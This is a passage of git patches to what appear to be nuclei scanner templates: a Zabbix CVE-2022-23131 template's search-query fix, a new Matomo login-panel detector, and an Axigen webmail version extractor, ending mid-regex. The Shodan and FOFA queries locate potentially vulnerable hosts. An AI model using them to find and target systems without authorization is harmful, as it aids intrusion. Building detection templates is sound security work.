@@ -13,7 +13,7 @@ info:
- https://github.com/1mxml/CVE-2022-23131
metadata:
shodan-query: http.favicon.hash:892542951
- fofa-query: app="ZABBIX-çæ§ç³»ç»" && body="saml"
+ fofa-query: app="ZABBIX-监控系统" && body="saml"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.8
From e994e4ae557fb561a798046113c18cc52132c593 Mon Sep 17 00:00:00 2001
From: Arr0way
Date: Tue, 8 Mar 2022 22:54:09 +0000
Subject: [PATCH 118/259] Added Matomo Login Portal Pannel Template
Added Matomo Login Portal Pannel Template
---
exposed-panels/matomo-login-portal.yaml | 21 +++++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 exposed-panels/matomo-login-portal.yaml
diff --git a/exposed-panels/matomo-login-portal.yaml b/exposed-panels/matomo-login-portal.yaml
new file mode 100644
index 0000000000..d826ec6df7
--- /dev/null
+++ b/exposed-panels/matomo-login-portal.yaml
@@ -0,0 +1,21 @@
+id: matomo-login-portal
+
+info:
+ name: Matomo Login Portal
+ author: Arr0way
+ severity: info
+ tags: panel
+ description: Matomo provides website analytics
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/"
+ - "{{BaseURL}}/matomo"
+ redirects: true
+ matchers-condition: or
+ matchers:
+ - type: word
+ words:
+ - "Sign in - Matomo"
+ part: body
From e2fa9a0386a96035184da8dfa1e08242d9578e59 Mon Sep 17 00:00:00 2001
From: idealphase
Date: Wed, 9 Mar 2022 15:18:50 +0700
Subject: [PATCH 120/259] Update axigen-webmail.yaml
Added axigen version extractor
---
exposed-panels/axigen-webmail.yaml | 9 ++++++++-
1 file changed, 8 insertions(+), 1 deletion(-)
diff --git a/exposed-panels/axigen-webmail.yaml b/exposed-panels/axigen-webmail.yaml
index ea433c21e8..ff710d0626 100644
--- a/exposed-panels/axigen-webmail.yaml
+++ b/exposed-panels/axigen-webmail.yaml
@@ -2,7 +2,7 @@ id: axigen-webmail
info:
name: Axigen WebMail
- author: dhiyaneshDk
+ author: dhiyaneshDk,idealphase
severity: info
description: This template determines if Axigen Webmail is running.
reference:
@@ -26,4 +26,11 @@ requests:
status:
- 200
+ extractors:
+ - type: regex
+ group: 1
+ part: body
+ regex:
+ - '